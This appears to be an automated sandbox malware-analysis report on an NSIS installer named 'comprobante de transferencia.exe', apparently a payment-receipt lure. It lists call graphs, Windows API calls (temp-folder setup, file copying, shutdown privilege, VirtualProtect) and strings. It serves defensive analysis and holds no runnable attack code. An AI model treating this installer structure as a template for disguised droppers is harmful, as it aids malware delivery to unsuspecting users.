5510 40443b 5506->5510 5507->5504 5507->5505 5511 4043e8 GetDlgItem SendMessageW 5507->5511 5512 4042fa 5508->5512 5509->5505 5514 4044bc 5509->5514 5510->5509 5518 404461 6 API calls 5510->5518 5533 404100 KiUserCallbackDispatcher 5511->5533 5516 4040de 19 API calls 5512->5516 5517 4044e4 5513->5517 5519 4044d2 5514->5519 5520 4044c2 SendMessageW 5514->5520 5522 404307 CheckDlgButton 5516->5522 5518->5509 5519->5517 5523 4044d8 SendMessageW 5519->5523 5520->5519 5521 404412 5524 40450e SendMessageW 5521->5524 5531 404100 KiUserCallbackDispatcher 5522->5531 5523->5517 5524->5504 5526 404325 GetDlgItem 5532 404113 SendMessageW 5526->5532 5528 40433b SendMessageW 5529 404361 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5528->5529 5530 404358 GetSysColor 5528->5530 5529->5517 5530->5529 5531->5526 5532->5528 5533->5521 5534 1000103d 5535 1000101b 5 API calls 5534->5535 5536 10001056 5535->5536 5537 4014ff 5538 401507 5537->5538 5540 40151a 5537->5540 5539 402ba2 18 API calls 5538->5539 5539->5540 5541 401000 5542 401037 BeginPaint GetClientRect 5541->5542 5543 40100c DefWindowProcW 5541->5543 5545 4010f3 5542->5545 5546 401179 5543->5546 5547 401073 CreateBrushIndirect FillRect DeleteObject 5545->5547 5548 4010fc 5545->5548 5547->5545 5549 401102 CreateFontIndirectW 5548->5549 5550 401167 EndPaint 5548->5550 5549->5550 5551 401112 6 API calls 5549->5551 5550->5546 5551->5550 5559 401904 5560 40193b 5559->5560 5561 402bbf 18 API calls 5560->5561 5562 401940 5561->5562 5563 40580b 69 API calls 5562->5563 5564 401949 5563->5564 5565 402d04 5566 402d16 SetTimer 5565->5566 5568 402d2f 5565->5568 5566->5568 5567 402d84 5568->5567 5569 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5568->5569 5569->5567 4302 403c06 4303 403d59 4302->4303 4304 403c1e 4302->4304 4306 403daa 4303->4306 4307 403d6a GetDlgItem GetDlgItem 4303->4307 4304->4303 4305 403c2a 4304->4305 4308 403c35 SetWindowPos 4305->4308 4309 403c48 4305->4309 4311 403e04 4306->4311 4320 401389 2 API calls 4306->4320 4310 4040de 19 API calls 4307->4310 4308->4309 4313 403c65 4309->4313 4314 403c4d ShowWindow 4309->4314 4315 403d94 SetClassLongW 4310->4315 4316 403d54 4311->4316 4372 40412a 4311->4372 4317 403c87 4313->4317 4318 403c6d DestroyWindow 4313->4318 4314->4313 4319 40140b 2 API calls 4315->4319 4322 403c8c SetWindowLongW 4317->4322 4323 403c9d 4317->4323 4321 404067 4318->4321 4319->4306 4324 403ddc 4320->4324 4321->4316 4331 404098 ShowWindow 4321->4331 4322->4316 4327 403d46 4323->4327 4328 403ca9 GetDlgItem 4323->4328 4324->4311 4329 403de0 SendMessageW 4324->4329 4325 40140b 2 API calls 4342 403e16 4325->4342 4326 404069 DestroyWindow EndDialog 4326->4321 4391 404145 4327->4391 4332 403cd9 4328->4332 4333 403cbc SendMessageW IsWindowEnabled 4328->4333 4329->4316 4331->4316 4335 403ce6 4332->4335 4336 403d2d SendMessageW 4332->4336 4337 403cf9 4332->4337 4346 403cde 4332->4346 4333->4316 4333->4332 4334 40603c 18 API calls 4334->4342 4335->4336 4335->4346 4336->4327 4339 403d01 4337->4339 4340 403d16 4337->4340 4385 40140b 4339->4385 4344 40140b 2 API calls 4340->4344 4341 403d14 4341->4327 4342->4316 4342->4325 4342->4326 4342->4334 4345 4040de 19 API calls 4342->4345 4363 403fa9 DestroyWindow 4342->4363 4375 4040de 4342->4375 4347 403d1d 4344->4347 4345->4342 4388 4040b7 4346->4388 4347->4327 4347->4346 4349 403e91 GetDlgItem 4350 403ea6 4349->4350 4351 403eae ShowWindow KiUserCallbackDispatcher 4349->4351 4350->4351 4378 404100 KiUserCallbackDispatcher 4351->4378 4353 403ed8 EnableWindow 4356 403eec 4353->4356 4354 403ef1 GetSystemMenu EnableMenuItem SendMessageW 4355 403f21 SendMessageW 4354->4355 4354->4356 4355->4356 4356->4354 4379 404113 SendMessageW 4356->4379 4380 40601a lstrcpynW 4356->4380 4359 403f4f lstrlenW 4360 40603c 18 API calls 4359->4360 4361 403f65 SetWindowTextW 4360->4361 4381 401389 4361->4381 4363->4321 4364 403fc3 CreateDialogParamW 4363->4364 4364->4321 4365 403ff6 4364->4365 4366 4040de 19 API calls 4365->4366 4367 404001 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4366->4367 4368 401389 2 API calls 4367->4368 4369 404047 4368->4369 4369->4316 4370 40404f ShowWindow 4369->4370 4371 40412a SendMessageW 4370->4371 4371->4321 4373 404142 4372->4373 4374 404133 SendMessageW 4372->4374 4373->4342 4374->4373 4376 40603c 18 API calls 4375->4376 4377 4040e9 SetDlgItemTextW 4376->4377 4377->4349 4378->4353 4379->4356 4380->4359 4383 401390 4381->4383 4382 4013fe 4382->4342 4383->4382 4384 4013cb MulDiv SendMessageW 4383->4384 4384->4383 4386 401389 2 API calls 4385->4386 4387 401420 4386->4387 4387->4346 4389 4040c4 SendMessageW 4388->4389 4390 4040be 4388->4390 4389->4341 4390->4389 4392 40415d GetWindowLongW 4391->4392 4402 4041e6 4391->4402 4393 40416e 4392->4393 4392->4402 4394 404180 4393->4394 4395 40417d GetSysColor 4393->4395 4396 404190 SetBkMode 4394->4396 4397 404186 SetTextColor 4394->4397 4395->4394 4398 4041a8 GetSysColor 4396->4398 4399 4041ae 4396->4399 4397->4396 4398->4399 4400 4041b5 SetBkColor 4399->4400 4401 4041bf 4399->4401 4400->4401 4401->4402 4403 4041d2 DeleteObject 4401->4403 4404 4041d9 CreateBrushIndirect 4401->4404 4402->4316 4403->4404 4404->4402 4405 402786 4406 40278d 4405->4406 4412 4029f7 4405->4412 4407 402ba2 18 API calls 4406->4407 4408 402798 4407->4408 4409 40279f SetFilePointer 4408->4409 4410 4027af 4409->4410 4409->4412 4413 405f61 wsprintfW 4410->4413 4413->4412 4501 100027c7 4502 10002817 4501->4502 4503 100027d7 VirtualProtect 4501->4503 4503->4502 5570 401907 5571 402bbf 18 API calls 5570->5571 5572 40190e 5571->5572 5573 40575f MessageBoxIndirectW 5572->5573 5574 401917 5573->5574 5575 401e08 5576 402bbf 18 API calls 5575->5576 5577 401e0e 5576->5577 5578 402bbf 18 API calls 5577->5578 5579 401e17 5578->5579 5580 402bbf 18 API calls 5579->5580 5581 401e20 5580->5581 5582 402bbf 18 API calls 5581->5582 5583 401e29 5582->5583 5584 401423 25 API calls 5583->5584 5585 401e30 ShellExecuteW 5584->5585 5586 401e61 5585->5586 5592 1000164f 5593 10001516 GlobalFree 5592->5593 5595 10001667 5593->5595 5594 100016ad GlobalFree 5595->5594 5596 10001682 5595->5596 5597 10001699 VirtualFree 5595->5597 5596->5594 5597->5594 5598 401491 5599 405179 25 API calls 5598->5599 5600 401498 5599->5600 5601 401a15 5602 402bbf 18 API calls 5601->5602 5603 401a1e ExpandEnvironmentStringsW 5602->5603 5604 401a32 5603->5604 5606 401a45 5603->5606 5605 401a37 lstrcmpW 5604->5605 5604->5606 5605->5606 5607 402515 5608 402bbf 18 API calls 5607->5608 5609 40251c 5608->5609 5612 405bef GetFileAttributesW CreateFileW 5609->5612 5611 402528 5612->5611 5613 402095 5614 402bbf 18 API calls 5613->5614 5615 40209c 5614->5615 5616 402bbf 18 API calls 5615->5616 5617 4020a6 5616->5617 5618 402bbf 18 API calls 5617->5618 5619 4020b0 5618->5619 5620 402bbf 18 API calls 5619->5620 5621 4020ba 5620->5621 5622 402bbf 18 API calls 5621->5622 5624 4020c4 5622->5624 5623 402103 CoCreateInstance 5628 402122 5623->5628 5624->5623 5625 402bbf 18 API calls 5624->5625 5625->5623 5626 401423 25 API calls 5627 4021e1 5626->5627 5628->5626 5628->5627 5629 401b16 5630 402bbf 18 API calls 5629->5630 5631 401b1d 5630->5631 5632 402ba2 18 API calls 5631->5632 5633 401b26 wsprintfW 5632->5633 5634 402a4c 5633->5634 5642 10001058 5644 10001074 5642->5644 5643 100010dd 5644->5643 5645 10001092 5644->5645 5646 10001516 GlobalFree 5644->5646 5647 10001516 GlobalFree 5645->5647 5646->5645 5648 100010a2 5647->5648 5649 100010b2 5648->5649 5650 100010a9 GlobalSize 5648->5650 5651 100010b6 GlobalAlloc 5649->5651 5652 100010c7 5649->5652 5650->5649 5653 1000153d 3 API calls 5651->5653 5654 100010d2 GlobalFree 5652->5654 5653->5652 5654->5643 5662 40159b 5663 402bbf 18 API calls 5662->5663 5664 4015a2 SetFileAttributesW 5663->5664 5665 4015b4 5664->5665 5031 40229d 5032 4022a5 5031->5032 5034 4022ab 5031->5034 5033 402bbf 18 API calls 5032->5033 5033->5034 5035 402bbf 18 API calls 5034->5035 5038 4022b9 5034->5038 5035->5038 5036 402bbf 18 API calls 5039 4022c7 5036->5039 5037 402bbf 18 API calls 5040 4022d0 WritePrivateProfileStringW 5037->5040 5038->5036 5038->5039 5039->5037 5666 401f1d 5667 402bbf 18 API calls 5666->5667 5668 401f24 5667->5668 5669 4063f4 5 API calls 5668->5669 5670 401f33 5669->5670 5671 401f4f GlobalAlloc 5670->5671 5674 401fb7 5670->5674 5672 401f63 5671->5672 5671->5674 5673 4063f4 5 API calls 5672->5673 5675 401f6a 5673->5675 5676 4063f4 5 API calls 5675->5676 5677 401f74 5676->5677 5677->5674 5681 405f61 wsprintfW 5677->5681 5679 401fa9 5682 405f61 wsprintfW 5679->5682 5681->5679 5682->5674 5683 40149e 5684 402288 5683->5684 5685 4014ac PostQuitMessage 5683->5685 5685->5684 5686 40249e 5687 402cc9 19 API calls 5686->5687 5688 4024a8 5687->5688 5689 402ba2 18 API calls 5688->5689 5690 4024b1 5689->5690 5691 4024d5 RegEnumValueW 5690->5691 5692 4024c9 RegEnumKeyW 5690->5692 5694 40281e 5690->5694 5693 4024ee RegCloseKey 5691->5693 5691->5694 5692->5693 5693->5694 5041 40231f 5042 402324 5041->5042 5043 40234f 5041->5043 5044 402cc9 19 API calls 5042->5044 5045 402bbf 18 API calls 5043->5045 5046 40232b 5044->5046 5049 402356 5045->5049 5047 402335 5046->5047 5050 40236c 5046->5050 5048 402bbf 18 API calls 5047->5048 5051 40233c RegDeleteValueW RegCloseKey 5048->5051 5053 402bff RegOpenKeyExW 5049->5053 5051->5050 5054 402c93 5053->5054 5055 402c2a 5053->5055 5054->5050 5056 402c50 RegEnumKeyW 5055->5056 5057 402c62 RegCloseKey 5055->5057 5059 402c87 RegCloseKey 5055->5059 5060 402bff 5 API calls 5055->5060 5056->5055 5056->5057 5058 4063f4 5 API calls 5057->5058 5061 402c72 5058->5061 5062 402c76 5059->5062 5060->5055 5061->5062 5063 402ca2 RegDeleteKeyW 5061->5063 5062->5054 5063->5062 5703 403821 5704 40382c 5703->5704 5705 403830 5704->5705 5706 403833 GlobalAlloc 5704->5706 5706->5705 5707 100010e1 5710 10001111 5707->5710 5708 100011d8 GlobalFree 5709 100012ba 2 API calls 5709->5710 5710->5708 5710->5709 5711 100011d3 5710->5711 5712 10001272 2 API calls 5710->5712 5713 10001164 GlobalAlloc 5710->5713 5714 100011f8 GlobalFree 5710->5714 5715 100011c4 GlobalFree 5710->5715 5716 100012e1 lstrcpyW 5710->5716 5711->5708 5712->5715 5713->5710 5714->5710 5715->5710 5716->5710 5717 401ca3 5718 402ba2 18 API calls 5717->5718 5719 401ca9 IsWindow 5718->5719 5720 401a05 5719->5720 5721 402a27 SendMessageW 5722 402a41 InvalidateRect 5721->5722 5723 402a4c 5721->5723 5722->5723 4875 40242a 4886 402cc9 4875->4886 4877 402434 4878 402bbf 18 API calls 4877->4878 4879 40243d 4878->4879 4880 402448 RegQueryValueExW 4879->4880 4885 40281e 4879->4885 4881 40246e RegCloseKey 4880->4881 4882 402468 4880->4882 4881->4885 4882->4881 4890 405f61 wsprintfW 4882->4890 4887 402bbf 18 API calls 4886->4887 4888 402ce2 4887->4888 4889 402cf0 RegOpenKeyExW 4888->4889 4889->4877 4890->4881 5724 40422c lstrlenW 5725 40424b 5724->5725 5726 40424d WideCharToMultiByte 5724->5726 5725->5726 4896 40172d 4897 402bbf 18 API calls 4896->4897 4898 401734 SearchPathW 4897->4898 4899 40174f 4898->4899 5734 404532 5735 404542 5734->5735 5736 404568 5734->5736 5737 4040de 19 API calls 5735->5737 5738 404145 8 API calls 5736->5738 5739 40454f SetDlgItemTextW 5737->5739 5740 404574 5738->5740 5739->5736 5741 4027b4 5742 4027ba 5741->5742 5743 4027c2 FindClose 5742->5743 5744 402a4c 5742->5744 5743->5744 5745 401b37 5746 401b88 5745->5746 5748 401b44 5745->5748 5747 401bb2 GlobalAlloc 5746->5747 5749 401b8d 5746->5749 5750 40603c 18 API calls 5747->5750 5752 401b5b 5748->5752 5754 401bcd 5748->5754 5760 402288 5749->5760 5766 40601a lstrcpynW 5749->5766 5750->5754 5751 40603c 18 API calls 5755 402282 5751->5755 5764 40601a lstrcpynW 5752->5764 5754->5751 5754->5760 5759 40575f MessageBoxIndirectW 5755->5759 5757 401b9f GlobalFree 5757->5760 5758 401b6a 5765 40601a lstrcpynW 5758->5765 5759->5760 5762 401b79 5767 40601a lstrcpynW 5762->5767 5764->5758 5765->5762 5766->5757 5767->5760 5768 402537 5769 402562 5768->5769 5770 40254b 5768->5770 5772 402596 5769->5772 5773 402567 5769->5773 5771 402ba2 18 API calls 5770->5771 5778 402552 5771->5778 5775 402bbf 18 API calls 5772->5775 5774 402bbf 18 API calls 5773->5774 5776 40256e WideCharToMultiByte lstrlenA 5774->5776 5777 40259d lstrlenW 5775->5777 5776->5778 5777->5778 5779 4025ca 5778->5779 5780 4025e0 5778->5780 5782 405cd0 5 API calls 5778->5782 5779->5780 5781 405ca1 WriteFile 5779->5781 5781->5780 5782->5779 4920 4052b8 4921 405462 4920->4921 4922 4052d9 GetDlgItem GetDlgItem GetDlgItem 4920->4922 4924 405493 4921->4924 4925 40546b GetDlgItem CreateThread FindCloseChangeNotification 4921->4925 4966 404113 SendMessageW 4922->4966 4927 4054be 4924->4927 4930 4054e3 4924->4930 4931 4054aa ShowWindow ShowWindow 4924->4931 4925->4924 4969 40524c 5 API calls 4925->4969 4926 405349 4935 405350 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4926->4935 4928 4054ca 4927->4928 4929 40551e 4927->4929 4932 4054d2 4928->4932 4933 4054f8 ShowWindow 4928->4933 4929->4930 4942 40552c SendMessageW 4929->4942 4934 404145 8 API calls 4930->4934 4968 404113 SendMessageW 4931->4968 4937 4040b7 SendMessageW 4932->4937 4938 405518 4933->4938 4939 40550a 4933->4939 4947 4054f1 4934->4947 4940 4053a2 SendMessageW SendMessageW 4935->4940 4941 4053be 4935->4941 4937->4930 4944 4040b7 SendMessageW 4938->4944 4943 405179 25 API calls 4939->4943 4940->4941 4945 4053d1 4941->4945 4946 4053c3 SendMessageW 4941->4946 4942->4947 4948 405545 CreatePopupMenu 4942->4948 4943->4938 4944->4929 4949 4040de 19 API calls 4945->4949 4946->4945 4950 40603c 18 API calls 4948->4950 4952 4053e1 4949->4952 4951 405555 AppendMenuW 4950->4951 4953 405572 GetWindowRect 4951->4953 4954 405585 TrackPopupMenu 4951->4954 4955 4053ea ShowWindow 4952->4955 4956 40541e GetDlgItem SendMessageW 4952->4956 4953->4954 4954->4947 4957 4055a0 4954->4957 4958 405400 ShowWindow 4955->4958 4959 40540d 4955->4959 4956->4947 4960 405445 SendMessageW SendMessageW 4956->4960 4961 4055bc SendMessageW 4957->4961 4958->4959 4967 404113 SendMessageW 4959->4967 4960->4947 4961->4961 4962 4055d9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4961->4962 4964 4055fe SendMessageW 4962->4964 4964->4964 4965 405627 GlobalUnlock SetClipboardData CloseClipboard 4964->4965 4965->4947 4966->4926 4967->4956 4968->4927 5783 4014b8 5784 4014be 5783->5784 5785 401389 2 API calls 5784->5785 5786 4014c6 5785->5786 4976 4015b9 4977 402bbf 18 API calls 4976->4977 4978 4015c0 4977->4978 4979 405a79 4 API calls 4978->4979 4991 4015c9 4979->4991 4980 401629 4982 40165b 4980->4982 4983 40162e 4980->4983 4981 4059fb CharNextW 4981->4991 4985 401423 25 API calls 4982->4985 4984 401423 25 API calls 4983->4984 4986 401635 4984->4986 4993 401653 4985->4993 4995 40601a lstrcpynW 4986->4995 4987 4056c5 2 API calls 4987->4991 4989 401642 SetCurrentDirectoryW 4989->4993 4990 4056e2 5 API calls 4990->4991 4991->4980 4991->4981 4991->4987 4991->4990 4992 40160f GetFileAttributesW 4991->4992 4994 405648 4 API calls 4991->4994 4992->4991 4994->4991 4995->4989 5787 40293b 5788 402ba2 18 API calls 5787->5788 5789 402941 5788->5789 5790 402964 5789->5790 5791 40297d 5789->5791 5799 40281e 5789->5799 5794 402969 5790->5794 5795 40297a 5790->5795 5792 402993 5791->5792 5793 402987 5791->5793 5797 40603c 18 API calls 5792->5797 5796 402ba2 18 API calls 5793->5796 5801 40601a lstrcpynW 5794->5801 5802 405f61 wsprintfW 5795->5802 5796->5799 5797->5799 5801->5799 5802->5799 5803 10002a7f 5804 10002a97 5803->5804 5805 1000158f 2 API calls 5804->5805 5806 10002ab2 5805->5806

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 40326a-40329d SetErrorMode GetVersion 1 4032b0 0->1 2 40329f-4032a7 call 4063f4 0->2 4 4032b5-4032c9 call 406384 lstrlenA 1->4 2->1 7 4032a9 2->7 9 4032cb-40333f call 4063f4 * 2 #17 OleInitialize SHGetFileInfoW call 40601a GetCommandLineW call 40601a GetModuleHandleW 4->9 7->1 18 403341-403348 9->18 19 403349-403363 call 4059fb CharNextW 9->19 18->19 22 403369-40336f 19->22 23 40347a-403494 GetTempPathW call 403239 19->23 25 403371-403376 22->25 26 403378-40337c 22->26 30 403496-4034b4 GetWindowsDirectoryW lstrcatW call 403239 23->30 31 4034ec-403506 DeleteFileW call 402dee 23->31 25->25 25->26 28 403383-403387 26->28 29 40337e-403382 26->29 32 403446-403453 call 4059fb 28->32 33 40338d-403393 28->33 29->28 30->31 48 4034b6-4034e6 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403239 30->48 51 4035b7-4035c7 call 403789 OleUninitialize 31->51 52 40350c-403512 31->52 49 403455-403456 32->49 50 403457-40345d 32->50 37 403395-40339d 33->37 38 4033ae-4033e7 33->38 44 4033a4 37->44 45 40339f-4033a2 37->45 39 403404-40343e 38->39 40 4033e9-4033ee 38->40 39->32 47 403440-403444 39->47 40->39 46 4033f0-4033f8 40->46 44->38 45->38 45->44 54 4033fa-4033fd 46->54 55 4033ff 46->55 47->32 56 403465-403473 call 40601a 47->56 48->31 48->51 49->50 50->22 58 403463 50->58 67 4036ed-4036f3 51->67 68 4035cd-4035dd call 40575f ExitProcess 51->68 59 4035a7-4035ae call 403863 52->59 60 403518-403523 call 4059fb 52->60 54->39 54->55 55->39 63 403478 56->63 58->63 70 4035b3 59->70 74 403571-40357b 60->74 75 403525-40355a 60->75 63->23 72 403771-403779 67->72 73 4036f5-40370b GetCurrentProcess OpenProcessToken 67->73 70->51 77 40377b 72->77 78 40377f-403783 ExitProcess 72->78 82 403741-40374f call 4063f4 73->82 83 40370d-40373b LookupPrivilegeValueW AdjustTokenPrivileges 73->83 80 4035e3-4035f7 call 4056e2 lstrcatW 74->80 81 40357d-40358b call 405ad6 74->81 76 40355c-403560 75->76 84 403562-403567 76->84 85 403569-40356d 76->85 77->78 94 403604-40361e lstrcatW lstrcmpiW 80->94 95 4035f9-4035ff lstrcatW 80->95 81->51 93 40358d-4035a3 call 40601a * 2 81->93 96 403751-40375b 82->96 97 40375d-403768 ExitWindowsEx 82->97 83->82 84->85 89 40356f 84->89 85->76 85->89 89->74 93->59 94->51 100 403620-403623 94->100 95->94 96->97 98 40376a-40376c call 40140b 96->98 97->72 97->98 98->72 103 403625-40362a call 405648 100->103 104 40362c call 4056c5 100->104 109 403631-40363f SetCurrentDirectoryW 103->109 104->109 112 403641-403647 call 40601a 109->112 113 40364c-403675 call 40601a 109->113 112->113 117 40367a-403696 call 40603c DeleteFileW 113->117 120 4036d7-4036df 117->120 121 403698-4036a8 CopyFileW 117->121 120->117 122 4036e1-4036e8 call 405ebb 120->122 121->120 123 4036aa-4036ca call 405ebb call 40603c call 4056fa 121->123 122->51 123->120 132 4036cc-4036d3 CloseHandle 123->132 132->120
                                            APIs
                                            • SetErrorMode.KERNELBASE ref: 0040328D
                                            • GetVersion.KERNEL32 ref: 00403293
                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032BC
                                            • #17.COMCTL32(00000007,00000009), ref: 004032DF
                                            • OleInitialize.OLE32(00000000), ref: 004032E6
                                            • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 00403302
                                            • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 00403317
                                            • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\comprobante de transferencia.exe",00000000), ref: 0040332A
                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\comprobante de transferencia.exe",00000020), ref: 00403351
                                              • Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
                                              • Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040348B
                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040349C
                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034A8
                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034BC
                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034C4
                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004034D5
                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004034DD
                                            • DeleteFileW.KERNELBASE(1033), ref: 004034F1
                                              • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                            • OleUninitialize.OLE32(?), ref: 004035BC
                                            • ExitProcess.KERNEL32 ref: 004035DD
                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 004035F0
                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040926C), ref: 004035FF
                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040360A
                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\comprobante de transferencia.exe",00000000,?), ref: 00403616
                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403632
                                            • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 0040368C
                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\comprobante de transferencia.exe,0041FEA8,?), ref: 004036A0
                                            • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 004036CD
                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004036FC
                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403703
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403718
                                            • AdjustTokenPrivileges.ADVAPI32 ref: 0040373B
                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403760
                                            • ExitProcess.KERNEL32 ref: 00403783
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                            • String ID: "C:\Users\user\Desktop\comprobante de transferencia.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven$C:\Users\user\Desktop$C:\Users\user\Desktop\comprobante de transferencia.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                            • API String ID: 2488574733-3436291073
                                            • Opcode ID: c7933ff0207dc42ed488cfd770cac36fd4143b1ba3a2b25aa7f82e1899741bfa
                                            • Instruction ID: 73295983c26b9bc795aacbdf710e3d5853a553e8a558082b103844ae68e0e3ab
                                            • Opcode Fuzzy Hash: c7933ff0207dc42ed488cfd770cac36fd4143b1ba3a2b25aa7f82e1899741bfa
                                            • Instruction Fuzzy Hash: C3D1F470644200BBD720BF659D45A3B3AACEB8074AF10487EF541B62D2DB7D9D42CB6E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 133 4052b8-4052d3 134 405462-405469 133->134 135 4052d9-4053a0 GetDlgItem * 3 call 404113 call 404a16 GetClientRect GetSystemMetrics SendMessageW * 2 133->135 137 405493-4054a0 134->137 138 40546b-40548d GetDlgItem CreateThread FindCloseChangeNotification 134->138 157 4053a2-4053bc SendMessageW * 2 135->157 158 4053be-4053c1 135->158 140 4054a2-4054a8 137->140 141 4054be-4054c8 137->141 138->137 145 4054e3-4054ec call 404145 140->145 146 4054aa-4054b9 ShowWindow * 2 call 404113 140->146 142 4054ca-4054d0 141->142 143 40551e-405522 141->143 147 4054d2-4054de call 4040b7 142->147 148 4054f8-405508 ShowWindow 142->148 143->145 151 405524-40552a 143->151 154 4054f1-4054f5 145->154 146->141 147->145 155 405518-405519 call 4040b7 148->155 156 40550a-405513 call 405179 148->156 151->145 159 40552c-40553f SendMessageW 151->159 155->143 156->155 157->158 162 4053d1-4053e8 call 4040de 158->162 163 4053c3-4053cf SendMessageW 158->163 164 405641-405643 159->164 165 405545-405570 CreatePopupMenu call 40603c AppendMenuW 159->165 172 4053ea-4053fe ShowWindow 162->172 173 40541e-40543f GetDlgItem SendMessageW 162->173 163->162 164->154 170 405572-405582 GetWindowRect 165->170 171 405585-40559a TrackPopupMenu 165->171 170->171 171->164 174 4055a0-4055b7 171->174 175 405400-40540b ShowWindow 172->175 176 40540d 172->176 173->164 177 405445-40545d SendMessageW * 2 173->177 178 4055bc-4055d7 SendMessageW 174->178 179 405413-405419 call 404113 175->179 176->179 177->164 178->178 180 4055d9-4055fc OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 178->180 179->173 182 4055fe-405625 SendMessageW 180->182 182->182 183 405627-40563b GlobalUnlock SetClipboardData CloseClipboard 182->183 183->164
                                            APIs
                                            • GetDlgItem.USER32(?,00000403), ref: 00405316
                                            • GetDlgItem.USER32(?,000003EE), ref: 00405325
                                            • GetClientRect.USER32(?,?), ref: 00405362
                                            • GetSystemMetrics.USER32(00000002), ref: 00405369
                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040538A
                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040539B
                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053AE
                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053BC
                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053CF
                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004053F1
                                            • ShowWindow.USER32(?,00000008), ref: 00405405
                                            • GetDlgItem.USER32(?,000003EC), ref: 00405426
                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405436
                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040544F
                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040545B
